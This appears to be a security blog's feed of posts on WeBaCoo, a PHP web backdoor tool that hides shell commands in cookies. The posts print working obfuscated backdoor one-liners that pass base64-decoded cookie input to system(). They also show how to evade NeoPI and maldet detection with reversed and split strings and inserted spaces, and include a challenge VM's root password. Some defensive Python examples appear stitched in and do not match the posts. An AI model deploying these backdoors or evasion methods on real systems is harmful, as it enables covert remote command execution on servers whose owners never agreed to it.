Anestis Bechtsoudis » webacoo
http://bechtsoudis.com
Driven by Passion for Challenges
Feed last built: Tue, 01 Jul 2014 12:30:55 +0000

Drunk Admin Web Hacking Challenge
Mon, 02 Apr 2012 15:20:33 +0000
http://bechtsoudis.com/2012/04/02/drunk-admin-web-hacking-challenge/

Recently I gave a few keynote talks on the WeBaCoo tool and on some web backdoor shell implementation techniques. As a strong supporter of practical learning, I designed a related web hacking challenge that was handed to the attendees after the talk. The challenge focuses on the techniques and methodologies discussed during the talks and uses a slightly restricted web server setup serving a vulnerable image hosting service.

Download

The challenge was served from a Debian VMware image, which is available for download at the following links:

Download Challenge (539MB) – md5sum: edf9bcd28049ed85312510d5872ea463
Download mirror from boot2root

Configuration

The network is configured to obtain an IP address via DHCP by default. If you want to configure the virtual machine further, you can log in as user root with password toor. The Apache web server is configured to listen on port 8880.

Mission

The challenge includes an image hosting web service that has various design vulnerabilities. You must enumerate the web service's features and find an exploitable vulnerability in order to read hidden system files. The web application is 100% custom, so don't bother searching Google for related PoC exploit code.

FINAL GOAL: Reveal the hidden message about a date arrangement that Bob sent to Alice.

Work Flow

  1. Enumerate the web application carefully
  2. If you get stuck, repeat step 1
  3. Try to spawn a web shell or find another way to execute server-side code
  4. Read the hidden message

Appendix

Congratulations to Kyriakos Ispoglou (CEID student), who was the first to solve the challenge 100%.

Available solution workflows (thanks for sending them):

Extra credit to mr.pr0n for providing a run2shell script that exploits the custom web application to spawn a remote shell on the vulnerable box.

If you find a different approach (with or without WeBaCoo), or have solved the challenge and want to disclose your solution, contact me.

A. Bechtsoudis

WeBaCoo Tool: Keeping your web shell under the mainstream radars
Wed, 21 Mar 2012 19:09:29 +0000
http://bechtsoudis.com/2012/03/21/webacoo-tool-keeping-your-web-shell-under-the-mainstream-radars/

Over the past two weeks I gave two presentations on the WeBaCoo tool: the first at the 3rd unauthorized security meeting (11 March 2012) and the second at the Patra's Linux User Group meetup (20 March 2012).

The presentations did not focus solely on WeBaCoo and its features: critical topics around web shell implementation and communication techniques were discussed, with emphasis on how a shell keeps a stealthy profile. Both events were followed by a custom web hacking challenge, for fun and learning.

I had a great time at both events and would like to thank the organizing committees behind the scenes and the people who attended the presentations. It's pleasant to see people starting to care about security issues and actively participating in relevant events.

Presentations can be downloaded from the following links:

Unauthorized (.pdf 1.1MB)

PLUG (.pdf 1.1MB)

A. Bechtsoudis

Expanding WeBaCoo
Sun, 29 Jan 2012 22:41:50 +0000
http://bechtsoudis.com/2012/01/30/expanding-webacoo/

Two months after the initial release, WeBaCoo's core communication functions are stable enough to provide a solid base for building extension modules. These modules are nothing more than the routine actions that pentesters and sysadmins perform while interacting with a system: database interaction, data file manipulation and so on. The idea behind extension module development is to provide stealthy, stable and highly customizable functionality within the main terminal mode. All modules operate on top of the main WeBaCoo communication function and adjust settings on the target system only where the module's operation requires it.

The extension modules were designed with both simplicity and stealth in mind. A module that offers large-scale functionality but can expose WeBaCoo by triggering IDS/IPS or application firewalls is not an option. A high degree of customization is a further goal at the top of the module design hierarchy. The basic module parameters are given by the user when the module is loaded from the interaction terminal, while experienced users who need to tune extra parameters can dig into the module's source code and edit the desired variables. Besides, pentesters have a well-earned reputation for custom-tweaking the open source tools they work with.

For detailed documentation on the available extension modules, refer to the modules page of the project wiki.

In the rest of the post three extension modules are analyzed: mysql-cli, psql-cli and upload.

MySQL-CLI

MySQL-CLI was the first module developed. It uses the mysql command line utility on the target server to execute MySQL commands against the database service (local or remote). When the user loads the mysql-cli module, the login credentials are stored in internal variables. In the mysql-cli interaction console, every command the user types is packed into a one-liner and executed on the target server, returning the relevant output from the database.

PSQL-CLI

PSQL-CLI is a module for interacting with PostgreSQL databases. It uses the target system's psql command line tool to communicate with the database. The challenge in designing this module was to get around the interactive authentication that psql uses to log in: unlike the mysql tool, psql offers no password parameter that would avoid the interactive password prompt. To work around this, a .pgpass file holding the login credentials is created in the user's home directory.

Upload

After messing around with the available choices and many tests, the final decision for the upload module was to use the HTTP POST method to upload files to the target host. A tiny PHP upload script is temporarily placed on the target to serve the upload and is then deleted. Every local file is uploaded as plain text to avoid server-side limitations or triggering protection mechanisms. Random file names are generated to enhance stealth. When using the upload module it is strongly advised to encrypt or obfuscate the files before upload, to prevent rule-based detection of dangerous system/function names.

If you have any further ideas for additional modules contact me.

A. Bechtsoudis

Running WeBaCoo over HTTPS through proxy
Tue, 20 Dec 2011 14:07:35 +0000
http://bechtsoudis.com/2011/12/20/running-webacoo-over-https-through-proxy/

Recently I got a bunch of emails asking how to run WeBaCoo against HTTPS websites. The current 0.2 version does not support SSL/TLS, but you can use the built-in proxy support together with a tool that offers a proxy (ZAP, Burp, etc.) instead. WeBaCoo uses a web proxy with HTTPS support to establish the secure connection to the web server, and then sends its requests and receives the responses through it. The rest of the article provides a case study using ZAP's proxy.

First, ZAP is started and configured to run a local HTTP proxy on port 8080.

With the local proxy listening, WeBaCoo's proxy support can be used to establish the secure connection with the remote web server:

root@testbed:~# ./webacoo.pl -t -u https://example.com/https_test.php -p 127.0.0.1:8080

And here are the requests & responses that ZAP captured:

A. Bechtsoudis

Maths behind web shell code detection
Fri, 16 Dec 2011 16:36:20 +0000
http://bechtsoudis.com/2011/12/16/maths-behind-web-shell-code-detection/

In trying to enhance WeBaCoo's stealth I continuously examine the tools and methods used to detect hidden web backdoor shell code on infected hosts. The latest tool that came to my attention is NeoPI, a Python script that uses various statistical methods to discover potentially obfuscated or encrypted content within text/script files. NeoPI follows a very interesting approach, ranking potentially malicious files based on entropy, longest word and index of coincidence tests. Unfortunately, WeBaCoo's base64-obfuscated backdoor code did not pass NeoPI undetected: it ranked within the top 10 in a regular web server setup. Consequently, I analysed the tool further to find ways of bypassing its tests effectively.

I mentioned NeoPI in one of my previous posts about web backdoor detection, although until recently I hadn't realized how useful it can prove under certain circumstances. The tool has five test categories:

  1. Entropy: measure the file's uncertainty over the ASCII character set
  2. Longest Word: long strings may be encrypted/obfuscated code
  3. Index of Coincidence: a low IC indicates potential encryption/obfuscation
  4. Signature: search files for “dangerous” strings
  5. Compression: compare the files' compression ratios

To examine NeoPI's results in a realistic setup, I set up a Debian web server VM with 3 CMS installations (Joomla, WordPress and Coppermine). Under the web root I placed two WeBaCoo-generated files: webacoo.php (base64 obfuscated) and webacoo_raw.php (raw PHP code).

To make the results more accurate, the file extension regular expression feature was used to scan only server-side PHP files. The initial scan report for all the tests under the webroot path is as follows:

root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$
[[ Total files scanned: 10235 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 48.170000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  6.1817		/var/www/gallery/lang/chinese_gb.php
  6.1784		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  6.1710		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  5.8753		/var/www/blog/wp-admin/js/revisions-js.php
  5.7846		/var/www/gallery/lang/japanese.php
  5.7306		/var/www/webacoo.php
  5.6484		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
  5.6296		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
  5.6203		/var/www/plugins/system/nonumberelements/helper.php
  5.6133		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
 
[[ Top 10 longest word files ]]
     745		/var/www/gallery/include/exif_php.inc.php
     745		/var/www/gallery/exifmgr.php
     741		/var/www/gallery/lang/japanese.php
     728		/var/www/blog/wp-admin/js/revisions-js.php
     522		/var/www/blog/wp-includes/functions.php
     516		/var/www/libraries/tcpdf/tcpdf.php
     474		/var/www/plugins/content/jw_allvideos/includes/sources.php
     456		/var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
     436		/var/www/gallery/lang/chinese_gb.php
     354		/var/www/blog/wp-includes/class-simplepie.php
 
[[ Average IC for Search ]]
0.0372679517799
 
[[ Top 10 lowest IC files ]]
  0.0198		/var/www/webacoo.php
  0.0206		/var/www/gallery/lang/chinese_gb.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  0.0217		/var/www/templates/system/index.php
  0.0217		/var/www/administrator/templates/system/index.php
  0.0222		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.0226		/var/www/blog/wp-admin/js/revisions-js.php
  0.0270		/var/www/includes/HTML_toolbar.php
  0.0272		/var/www/templates/beez/html/com_user/reset/complete.php
 
[[ Top 10 signature match counts ]]
      43		/var/www/gallery/include/themes.inc.php
      43		/var/www/gallery/themes/sample/theme.php
      26		/var/www/blog/wp-admin/includes/class-ftp.php
      19		/var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
      14		/var/www/libraries/geshi/geshi/php.php
      13		/var/www/blog/wp-includes/Text/Diff/Engine/native.php
      10		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
       9		/var/www/gallery/include/functions.inc.php
       8		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
       8		/var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
 
[[ Top 10 compression match counts ]]
  1.0704		/var/www/administrator/templates/system/index.php
  1.0704		/var/www/templates/system/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
  0.9663		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.8958		/var/www/includes/mambo.php
  0.8860		/var/www/includes/joomla.php
  0.8821		/var/www/includes/vcard.class.php
  0.8818		/var/www/includes/PEAR/PEAR.php
  0.8796		/var/www/includes/HTML_toolbar.php
 
[[ Top cumulative ranked files ]]
     122		/var/www/webacoo.php
     202		/var/www/blog/wp-admin/js/revisions-js.php
     528		/var/www/plugins/content/jw_allvideos/includes/elements/header.php
     912		/var/www/plugins/content/jw_allvideos/includes/helper.php
     984		/var/www/modules/mod_archive/helper.php
    1100		/var/www/libraries/bitfolge/vcard.php
    1210		/var/www/administrator/components/com_content/elements/article.php
    1240		/var/www/gallery/addfav.php
    1246		/var/www/administrator/components/com_installer/admin.installer.php
    1258		/var/www/administrator/components/com_config/views/component/view.php

While webacoo_raw.php passed the tests, the obfuscated code (webacoo.php) did not have the same luck. The entropy and index of coincidence tests gave it the highest scores, marking the file as possibly malicious. Besides these two, the obfuscated code also scores high on the longest word test, but that is not visible in the lab setup because the CMS code itself contains long strings (matching and validation patterns).

These high scores are due to the base64-encoded payload string. To bypass them, the generated code must implement some new features that trick these tests. My first thought was to split the encoded data into smaller chunks that are concatenated to form the overall payload; after some tests, however, this proved insufficient to bypass the IC and entropy tests. A second approach is to insert spaces into the encoded data (space is not a valid base64 character) and remove them with a replace function before decoding the data.

The question now is: after how many characters should a space be inserted for the best result? To find the most efficient value, I created code files with different group sizes (a space after every 1, 5, 10 and 20 characters) and ran NeoPI to compare the results.

root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/pwn/ \.php$
[[ Total files scanned: 30 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 0.010000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  5.7646		/var/www/pwn/webacoo_new20.php
  5.7306		/var/www/pwn/webacoo.php
  5.6999		/var/www/pwn/webacoo_new10.php
  5.5322		/var/www/pwn/webacoo_new5.php
  5.1328		/var/www/pwn/webacoo_raw.php
  4.2037		/var/www/pwn/webacoo_new1.php
 
[[ Top 10 longest word files ]]
     295		/var/www/pwn/webacoo.php
      94		/var/www/pwn/webacoo_raw.php
      51		/var/www/pwn/webacoo_new1.php
      51		/var/www/pwn/webacoo_new10.php
      51		/var/www/pwn/webacoo_new5.php
      51		/var/www/pwn/webacoo_new20.php
 
[[ Average IC for Search ]]
0.040872937004
 
[[ Top 10 lowest IC files ]]
  0.0194		/var/www/pwn/webacoo_new20.php
  0.0198		/var/www/pwn/webacoo.php
  0.0224		/var/www/pwn/webacoo_new10.php
  0.0301		/var/www/pwn/webacoo_raw.php
  0.0338		/var/www/pwn/webacoo_new5.php
  0.2009		/var/www/pwn/webacoo_new1.php
 
[[ Top 10 signature match counts ]]
       1		/var/www/pwn/webacoo.php
       1		/var/www/pwn/webacoo_raw.php
       1		/var/www/pwn/webacoo_new1.php
       1		/var/www/pwn/webacoo_new10.php
       1		/var/www/pwn/webacoo_new5.php
       1		/var/www/pwn/webacoo_new20.php
 
[[ Top 10 compression match counts ]]
  0.8114		/var/www/pwn/webacoo_new10.php
  0.8101		/var/www/pwn/webacoo_new20.php
  0.7993		/var/www/pwn/webacoo.php
  0.7947		/var/www/pwn/webacoo_new5.php
  0.7593		/var/www/pwn/webacoo_raw.php
  0.5407		/var/www/pwn/webacoo_new1.php
 
[[ Top cumulative ranked files ]]
       8		/var/www/pwn/webacoo_new20.php
       9		/var/www/pwn/webacoo.php
      11		/var/www/pwn/webacoo_new10.php
      17		/var/www/pwn/webacoo_new5.php
      17		/var/www/pwn/webacoo_raw.php
      22		/var/www/pwn/webacoo_new1.php

webacoo_new20.php (a space after every 20 characters) behaves worst (even worse than the original webacoo.php with no spaces inserted). On the other hand, webacoo_new1.php (a space after every character) ranks as least suspicious in every partial test, making it the most efficient choice (even better than the raw code).

Consequently, the new final backdoor file, which passes NeoPI undetected, is as follows:

<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>
root@testbed:~# ./neopi.py -z -e -l -i -s /var/www/ \.php$
[[ Total files scanned: 10230 ]]
[[ Total files ignored: 0 ]]
[[ Scan Time: 46.120000 seconds ]]
 
[[ Top 10 entropic files for a given search ]]
  6.1817		/var/www/gallery/lang/chinese_gb.php
  6.1784		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  6.1710		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  5.8753		/var/www/blog/wp-admin/js/revisions-js.php
  5.7846		/var/www/gallery/lang/japanese.php
  5.6484		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
  5.6296		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/sk.php
  5.6203		/var/www/plugins/system/nonumberelements/helper.php
  5.6133		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/pl.php
  5.6060		/var/www/blog/wp-config.php
 
[[ Top 10 longest word files ]]
     745		/var/www/gallery/include/exif_php.inc.php
     745		/var/www/gallery/exifmgr.php
     741		/var/www/gallery/lang/japanese.php
     728		/var/www/blog/wp-admin/js/revisions-js.php
     522		/var/www/blog/wp-includes/functions.php
     516		/var/www/libraries/tcpdf/tcpdf.php
     474		/var/www/plugins/content/jw_allvideos/includes/sources.php
     456		/var/www/blog/wp-content/plugins/sexybookmarks/includes/html-helpers.php
     436		/var/www/gallery/lang/chinese_gb.php
     354		/var/www/blog/wp-includes/class-simplepie.php
 
[[ Average IC for Search ]]
0.0372700176166
 
[[ Top 10 lowest IC files ]]
  0.0206		/var/www/gallery/lang/chinese_gb.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-tw.php
  0.0217		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/zh-cn.php
  0.0217		/var/www/templates/system/index.php
  0.0217		/var/www/administrator/templates/system/index.php
  0.0222		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.0226		/var/www/blog/wp-admin/js/revisions-js.php
  0.0270		/var/www/includes/HTML_toolbar.php
  0.0272		/var/www/templates/beez/html/com_user/reset/complete.php
  0.0273		/var/www/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/langs/cs.php
 
[[ Top 10 signature match counts ]]
      43		/var/www/gallery/include/themes.inc.php
      43		/var/www/gallery/themes/sample/theme.php
      26		/var/www/blog/wp-admin/includes/class-ftp.php
      19		/var/www/blog/wp-content/plugins/nextgen-gallery/lib/imagemagick.inc.php
      14		/var/www/libraries/geshi/geshi/php.php
      13		/var/www/blog/wp-includes/Text/Diff/Engine/native.php
      10		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
       9		/var/www/gallery/include/functions.inc.php
       8		/var/www/blog/wp-includes/js/tinymce/plugins/spellchecker/config.php
       8		/var/www/blog/wp-admin/includes/class-wp-filesystem-ssh2.php
 
[[ Top 10 compression match counts ]]
  1.0704		/var/www/administrator/templates/system/index.php
  1.0704		/var/www/templates/system/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/includes/index.php
  1.0000		/var/www/blog/wp-content/plugins/sexybookmarks/js/index.php
  0.9663		/var/www/blog/wp-content/themes/lightword/alternatives/404.php
  0.8958		/var/www/includes/mambo.php
  0.8860		/var/www/includes/joomla.php
  0.8821		/var/www/includes/vcard.class.php
  0.8818		/var/www/includes/PEAR/PEAR.php
  0.8796		/var/www/includes/HTML_toolbar.php
 
[[ Top cumulative ranked files ]]
     199		/var/www/blog/wp-admin/js/revisions-js.php
     521		/var/www/plugins/content/jw_allvideos/includes/elements/header.php
     907		/var/www/plugins/content/jw_allvideos/includes/helper.php
     977		/var/www/modules/mod_archive/helper.php
    1094		/var/www/libraries/bitfolge/vcard.php
    1203		/var/www/administrator/components/com_content/elements/article.php
    1233		/var/www/gallery/addfav.php
    1240		/var/www/administrator/components/com_installer/admin.installer.php
    1252		/var/www/administrator/components/com_config/views/component/view.php
    1264		/var/www/xmlrpc/includes/framework.php

This new technique for bypassing statistical detection methods will be implemented in WeBaCoo's next release.
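To make the five tests and the space-insertion comparison above concrete, here is an added example (my own Python, not NeoPI's or WeBaCoo's code) that implements entropy, index of coincidence, longest word and compression ratio from their textbook definitions, runs them over three constructed sample files (benign PHP, a base64 literal, and the same literal with a space after every character), and adds the step a defender would want: stripping whitespace inside string literals before measuring, which gives the spaced file the same scores as the un-spaced one. The sample contents and the normalise() heuristic are my assumptions.

```python
"""Statistical web-shell indicators plus a whitespace-normalisation pre-pass.

Added example, not NeoPI or WeBaCoo code: the four statistics follow their
textbook definitions, and the three sample "files" below are constructed here.
"""
import base64
import hashlib
import math
import re
import zlib
from collections import Counter
from typing import Dict

# Constructed samples. BLOB is base64 of 256 pseudo-random bytes (SHA-256 of
# eight small integers), so it has the flat byte distribution of encoded data.
BLOB = base64.b64encode(b"".join(hashlib.sha256(bytes([i])).digest() for i in range(8)))
BENIGN = b'<?php\n$name = htmlspecialchars($_GET["name"]);\necho "Hello, " . $name;\n?>\n'
ENCODED = b'<?php $d = "' + BLOB + b'"; ?>\n'
# Same literal with a space after every character, like the post's webacoo_new1.php.
SPACED = b'<?php $d = "' + b" ".join(bytes([c]) for c in BLOB) + b'"; ?>\n'


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: roughly 4-5 for source code, close to 6 for pure base64."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def index_of_coincidence(data: bytes) -> float:
    """Chance that two positions hold the same byte; flat (encoded) data scores low."""
    n = len(data)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(data).values()) / (n * (n - 1))


def longest_word(data: bytes) -> int:
    """Longest run without whitespace; long runs suggest packed payload strings."""
    return max((len(w) for w in re.split(rb"\s+", data)), default=0)


def compression_ratio(data: bytes) -> float:
    """compressed/original size; already-dense encoded data compresses poorly."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def normalise(data: bytes) -> bytes:
    """Drop whitespace inside double-quoted literals before measuring.

    Spaces padded into an encoded string are removed by the script's own
    str_replace() before decoding, so the scanner should measure the literal the
    way the decoder sees it. Heuristic: literals containing quotes or backslashes
    are left untouched.
    """
    return re.sub(rb'"([^"\\]*)"',
                  lambda m: b'"' + re.sub(rb"\s+", b"", m.group(1)) + b'"', data)


def indicators(data: bytes) -> Dict[str, float]:
    """All four statistics for one file body, rounded for display."""
    return {
        "entropy": round(shannon_entropy(data), 4),
        "ic": round(index_of_coincidence(data), 4),
        "longest_word": longest_word(data),
        "compression": round(compression_ratio(data), 4),
    }


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("encoded", ENCODED), ("spaced", SPACED)):
        print(f"{label:8} raw        {indicators(sample)}")
        print(f"{label:8} normalised {indicators(normalise(sample))}")
```

Without the normalisation pass the spaced sample scores lower entropy, higher IC and a short longest word than the benign file, exactly the effect the post measured; after it, the spaced and un-spaced samples are byte-identical and score the same.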

A. Bechtsoudis

Bypass base64 decoder detection
Sun, 11 Dec 2011 19:36:41 +0000
http://bechtsoudis.com/2011/12/11/bypass-base64-decoder-detection/

Almost two weeks after WeBaCoo's release, I started to organize the results of various tests against different protection/detection tools for a comprehensive write-up. Something that drew my attention is how easily some malware scanning tools mark WeBaCoo's generated backdoor code as a “threat”. A single call to the base64 decoder function is enough to trigger the scanners' content matching rulesets, no matter what data is being processed. On top of this strict approach, I recently came across some official web backdoor detection tutorials on the Internet that include content matching checks for the decoder function. These two things led me to a small piece of research into tricks for bypassing such content matching mechanisms.

The tools and scripts that marked WeBaCoo's generated code as a “threat” because of the base64 decoder call are listed below (see the first image gallery at the end of the post for report screenshots):

After inspecting how the above tools work, I came up with two main methods for tricking the base64 decoder content matching rules: string reversing and string splitting. The two can be combined to create trickier code, always keeping character use to a minimum. WeBaCoo generates PHP backdoor code, so I will work through these methods in PHP, although the same concept applies to other languages too.

String Reversing

Luckily for us, PHP provides the strrev() function to reverse a string easily. Knowing that base64_decode was the function name that triggered the above tools, strrev can be used to trick them. Let's form an example to see that the concept works before altering the backdoor.

<?php
//base64 encoding of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";

//$bd="base64_decode"
$bd=strrev("edoced_46esab");

//print the decoded data
//eval is used to evaluate the string as PHP code
eval("echo \$bd(\$data);");
?>
root@testbed:~# php reverse.php
show me your code
root@testbed:~# maldet -a /var/www/pwn/reverse.php
Linux Malware Detect v1.4.1
(C) 2002-2011, R-fx Networks (C) 2011, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(4332): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)
maldet(4332): {scan} building file list for /var/www/pwn/reverse.php, this might take awhile...
maldet(4332): {scan} file list completed, found 1 files...
maldet(4332): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(4332): {scan} scan of /var/www/pwn/reverse.php (1 files) in progress...

maldet(4332): {scan} scan completed on /var/www/pwn/reverse.php: files 1, malware hits 0, cleaned hits 0
maldet(4332): {scan} scan report saved, to view run: maldet --report 121111-2034.4332

String Splitting

The concept behind this technique is to split the trigger string (“base64_decode”) into smaller chunks that are later concatenated to form the function name.

<?php
//base64 encoding of "show me your code"
$data="c2hvdyBtZSB5b3VyIGNvZGU=";

//split into two chunks
$ac="base6";
$bc="4_decode";

//concatenate the chunks
$cc=$ac.$bc;

//print the decoded data
//eval is used to evaluate the string as PHP code
eval("echo \$cc(\$data);");
?>
root@testbed:~# php split.php
show me your code
root@testbed:~# maldet -a /var/www/pwn/split.php
Linux Malware Detect v1.4.1
(C) 2002-2011, R-fx Networks (C) 2011, Ryan MacDonald
inotifywait (C) 2007, Rohan McGovern
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(4509): {scan} signatures loaded: 8668 (6804 MD5 / 1864 HEX)
maldet(4509): {scan} building file list for /var/www/pwn/split.php, this might take awhile...
maldet(4509): {scan} file list completed, found 1 files...
maldet(4509): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(4509): {scan} scan of /var/www/pwn/split.php (1 files) in progress...

maldet(4509): {scan} scan completed on /var/www/pwn/split.php: files 1, malware hits 0, cleaned hits 0
maldet(4509): {scan} scan report saved, to view run: maldet --report 121111-2049.4509

Knowing that the above two techniques defeat detection of the decoder's function name, they can be combined to form the desired functionality. The following PHP code is a short example of such a combination, as used in the new backdoor code. I ran the same tests to see whether the new backdoor code passes all of them; the results are in the second image gallery at the end of the post.

<?php $c=strrev("edoced_4"."6esab");eval($c("aWYoaXNzZXQoJF9DT09LSUVbJ2NtJ10pKXtvYl9zdGFydCgpO3N5c3RlbShiYXNlNjRfZGVjb2RlKCRfQ09PS0lFWydjbSddKS4nIDI+JjEnKTtzZXRjb29raWUoJF9DT09LSUVbJ2NuJ10sJF9DT09LSUVbJ2NwJ10uYmFzZTY0X2VuY29kZShvYl9nZXRfY29udGVudHMoKSkuJF9DT09LSUVbJ2NwJ10pO29iX2VuZF9jbGVhbigpO30=")); ?>
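As an added example (my own Python, not code from the post, from WeBaCoo or from any of the scanners named), here is the defender's answer to both tricks: fold literal-only string expressions (concatenation, strrev() on a literal, variables that hold literals) to a fixed point before running the signature match, so the reversed and split names in reverse.php and split.php resolve back to base64_decode. The regexes and the SIGNATURES list are my assumptions.

```python
"""Constant-folding pre-pass for a signature scanner (added example, not maldet/WeBaCoo code).

The post's reverse.php and split.php hide "base64_decode" behind strrev() and
behind concatenation. Evaluating literal-only expressions before matching makes
the original name visible again.
"""
import re
from typing import Set

# Names a signature scanner keys on; the post's tools fired on base64_decode alone.
SIGNATURES = ("base64_decode", "eval", "system", "passthru", "shell_exec")

_LIT = r'"([^"\\]*)"'                                      # double-quoted literal, no escapes
_CONCAT = re.compile(_LIT + r"\s*\.\s*" + _LIT)            # "a" . "b"
_STRREV = re.compile(r"\bstrrev\(\s*" + _LIT + r"\s*\)")   # strrev("...")
_ASSIGN = re.compile(r"\$(\w+)\s*=\s*" + _LIT + r"\s*;")   # $var = "...";


def fold_constants(src: str, max_rounds: int = 20) -> str:
    """Evaluate literal-only string expressions until nothing changes."""
    for _ in range(max_rounds):
        new = _CONCAT.sub(lambda m: f'"{m.group(1)}{m.group(2)}"', src)
        new = _STRREV.sub(lambda m: f'"{m.group(1)[::-1]}"', new)
        # Propagate variables holding literals into later plain uses; the
        # assignment itself and escaped "\$var" inside strings are left alone.
        for var, val in _ASSIGN.findall(new):
            use = re.compile(r"(?<!\\)\$" + re.escape(var) + r"\b(?!\s*=[^=])")
            new = use.sub(lambda m, v=val: f'"{v}"', new)
        if new == src:
            break
        src = new
    return src


def naive_scan(src: str) -> Set[str]:
    """Plain signature match: what the scanners in the post effectively do."""
    return {sig for sig in SIGNATURES if re.search(r"\b" + sig + r"\s*\(", src)}


def folded_scan(src: str) -> Set[str]:
    """Fold first, then match; also report dangerous names parked in variables
    and calls made through a variable ($f(...)), the way the folded name gets used."""
    folded = fold_constants(src)
    hits = naive_scan(folded)
    for var, val in _ASSIGN.findall(folded):
        if val in SIGNATURES:
            hits.add(f"{val} via ${var}")
    if re.search(r"\$\w+\s*\(", folded):
        hits.add("call through variable")
    return hits


# The post's two demo files (they only decode "show me your code").
REVERSE_PHP = r'''<?php
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
$bd=strrev("edoced_46esab");
eval("echo \$bd(\$data);");
?>'''

SPLIT_PHP = r'''<?php
$data="c2hvdyBtZSB5b3VyIGNvZGU=";
$ac="base6";
$bc="4_decode";
$cc=$ac.$bc;
eval("echo \$cc(\$data);");
?>'''

if __name__ == "__main__":
    for name, src in (("reverse.php", REVERSE_PHP), ("split.php", SPLIT_PHP)):
        print(name, "naive:", sorted(naive_scan(src)), "folded:", sorted(folded_scan(src)))
```

The naive pass sees only eval in both files; the folded pass additionally reports base64_decode parked in $bd and $cc, and the call through a variable that uses it.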

These two techniques will be implemented in WeBaCoo's next release once I settle on the most efficient way to use them.

Initial Code Report Results

New Code Report Results

DISCLAIMER: I'm not responsible for what you do with this info. This information is for educational purposes only.

A. Bechtsoudis

WeBaCoo (Web Backdoor Cookie) Script-Kit – The Birth
Tue, 29 Nov 2011 14:48:47 +0000
http://bechtsoudis.com/2011/11/29/webacoo-web-backdoor-cookie-script-kit-the-birth/

Recently I was messing around with some PHP backdoors capable of providing a “pseudo”-terminal connection to a remote web server injected with a chunk of malicious PHP code. All the existing scripts and tools (such as weevely and hookworm) send the shell commands hidden in HTTP header fields, but the server's output is printed as part of the HTML body. Inspired by these implementations, I thought: why not send the server's command output in the HTTP response headers instead? And out of these dark thoughts the WeBaCoo (Web Backdoor Cookie) script-kit was born.

The general concept is pretty simple. First the backdoor PHP code is generated from payloads built around the main PHP system functions, operating under a basic cookie handling mechanism. After the code is injected, the client sends shell commands hidden in Cookie headers, obfuscated with base64 encoding. On the server side the command is executed and the output is sent back to the client hidden (base64 encoded too) in Set-Cookie headers.

WeBaCoo is written in Perl and is available on GitHub. Clone the repository:

git clone git://github.com/anestisb/WeBaCoo.git

Or download the latest version from:

http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

